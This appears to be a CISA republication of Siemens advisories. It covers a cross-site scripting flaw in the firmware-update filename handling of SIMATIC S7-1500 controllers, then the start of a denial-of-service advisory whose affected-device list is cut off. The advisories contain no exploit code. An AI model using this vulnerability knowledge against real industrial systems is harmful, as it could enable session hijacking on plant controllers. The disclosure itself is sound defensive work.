Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE-2026-25789
Affected devices do not properly validate and sanitize filenames on the Firmware Update page. This could allow a remote attacker to social engineer the user into selecting the modified firmware file to be uploaded. This would result in malicious JavaScript execution in the context of the authenticated user's session without requiring the file to be uploaded, potentially leading to session hijacking or credential theft.
Affected Products: Siemens SIMATIC S7 PLC Web Server
Vendor: Siemens
Product Version: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0), SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0), SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0), SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0), SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0), SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. 
SIPLUS variants) V3 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs, SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0), SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0), SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0), SIMATIC 
S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0), SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0), SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0), SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0), SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0), SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0), SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0), SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0), SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0), SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0), SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0), SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0), SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0), SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0), SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0), SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0), SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0), SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0), SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0), SIMATIC S7-1500 
CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0), SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0), SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0), SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0), SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0), SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0), SIMATIC S7-1500 Software Controller CPU 1507S F V2, SIMATIC S7-1500 Software Controller CPU 1507S F V3, SIMATIC S7-1500 Software Controller CPU 1507S F V4, SIMATIC S7-1500 Software Controller CPU 1507S V2, SIMATIC S7-1500 Software Controller CPU 1507S V3, SIMATIC S7-1500 Software Controller CPU 1507S V4, SIMATIC S7-1500 Software Controller CPU 1508S F V2, SIMATIC S7-1500 Software Controller CPU 1508S F V3, SIMATIC S7-1500 Software Controller CPU 1508S F V4, SIMATIC S7-1500 Software Controller CPU 1508S T V3, SIMATIC S7-1500 Software Controller CPU 1508S TF V3, SIMATIC S7-1500 Software Controller CPU 1508S V2, SIMATIC S7-1500 Software Controller CPU 1508S V3, SIMATIC S7-1500 Software Controller CPU 1508S V4, SIMATIC S7-1500 Software Controller Linux V2, SIMATIC S7-1500 Software Controller Linux V3, SIMATIC S7-PLCSIM Advanced, SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0), SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0), SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0), SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0), SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL 
(6AG2512-1SK01-4AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-2AB0), SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0), SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0), SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0), SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0), SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0), SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0), SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0), SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0), SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0), SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0), SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0), SIPLUS S7-1500 CPU 1516F-3 
PN/DP (6AG1516-3FN00-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0), SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0), SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0), SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0)
Product Status: known_affected
Remediations
Mitigation: Restrict access to the function right "firmware update" to instructed personnel.
No fix planned: Currently no fix is planned
None available: Currently no fix is available
Vendor fix: Update to V2.9.9 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/
Vendor fix: Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109773914/
Vendor fix: Update to V3.1.6 or later version https://support.industry.siemens.com/cs/ww/en/view/109478459/
Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Metrics
CVSS Version: 3.1
Base Score: 7.1
Base Severity: HIGH
Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Acknowledgments
Siemens ProductCERT reported these vulnerabilities to CISA. Lukas Sohrmann reported these vulnerabilities to Siemens.

General Recommendations
As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security) and following the recommendations in the product manuals.
Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use
The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-688146 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
2026-05-12 (Revision 1): Publication Date
2026-05-14 (Revision 2): Initial CISA Republication of Siemens ProductCERT SSA-688146 advisory

Siemens Industrial Devices

Summary
Multiple industrial devices contain a vulnerability that could allow an attacker to cause a denial of service condition. Siemens has released new versions for several affected products and recommends updating to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet, available.

The following versions of Siemens Industrial Devices are affected:
IE/PB LINK HA (6GK1411-5BB00) vers:all/* (CVE-2025-40833) IE/PB link PN IO (6GK1411-5AB10) vers:all/* (CVE-2025-40833) RUGGEDCOM RM1224 LTE(4G) EU (6GK6108-4AM00-2BA2) vers:intdot/<8.3 (CVE-2025-40833) RUGGEDCOM RM1224 LTE(4G) NAM (6GK6108-4AM00-2DA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M804PB (6GK5804-0AP00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M812-1 ADSL-Router (6GK5812-1AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M812-1 ADSL-Router (6GK5812-1BA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M816-1 ADSL-Router (6GK5816-1AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M816-1 ADSL-Router (6GK5816-1BA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M826-2 SHDSL-Router (6GK5826-2AB00-2AB2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M874-2 (6GK5874-2AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M874-3 (6GK5874-3AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M874-3 3G-Router (CN) (6GK5874-3AA00-2FA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-3 (6GK5876-3AA02-2BA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-3 (ROK) (6GK5876-3AA02-2EA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-4 (6GK5876-4AA10-2BA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-4 (EU) (6GK5876-4AA00-2BA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE M876-4 (NAM) (6GK5876-4AA00-2DA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUB852-1 (A1) (6GK5852-1EA10-1AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUB852-1 (B1) (6GK5852-1EA10-1BA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE 
MUM853-1 (A1) (6GK5853-2EA10-2AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM853-1 (B1) (6GK5853-2EA10-2BA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM853-1 (EU) (6GK5853-2EA00-2DA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (A1) (6GK5856-2EA10-3AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (B1) (6GK5856-2EA10-3BA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (CN) (6GK5856-2EA00-3FA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (EU) (6GK5856-2EA00-3DA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE MUM856-1 (RoW) (6GK5856-2EA00-3AA1) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE S615 EEC LAN-Router (6GK5615-0AA01-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE S615 LAN-Router (6GK5615-0AA00-2AA2) vers:intdot/<8.3 (CVE-2025-40833) SCALANCE SC622-2C (6GK5622-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC626-2C (6GK5626-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC632-2C (6GK5632-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC636-2C (6GK5636-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC642-2C (6GK5642-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE SC646-2C (6GK5646-2GS00-2AC2) vers:all/* (CVE-2025-40833) SCALANCE W1748-1 M12 (6GK5748-1GY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W1748-1 M12 (6GK5748-1GY01-0TA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-1 M12 (6GK5788-1GY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-2 EEC M12 (6GK5788-2GY01-0TA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-2 M12 (6GK5788-2GY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W1788-2IA M12 (6GK5788-2HY01-0AA0) vers:all/* (CVE-2025-40833) SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) 
SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 RJ45 
(6GK5786-2FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) vers:intdot/<6.6.0 (CVE-2025-40833) SCALANCE WAB762-1 (6GK5762-1AJ00-6AA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM763-1 (6GK5763-1AL00-7DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM763-1 (ME) (6GK5763-1AL00-7DC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM763-1 (US) (6GK5763-1AL00-7DB0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 (6GK5766-1GE00-7DA0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 (ME) (6GK5766-1GE00-7DC0) vers:intdot/<3.2.0 (CVE-2025-40833) SCALANCE WAM766-1 (US) (6GK5766-1GE00-7DB0) vers:intdot/<3.2.0 
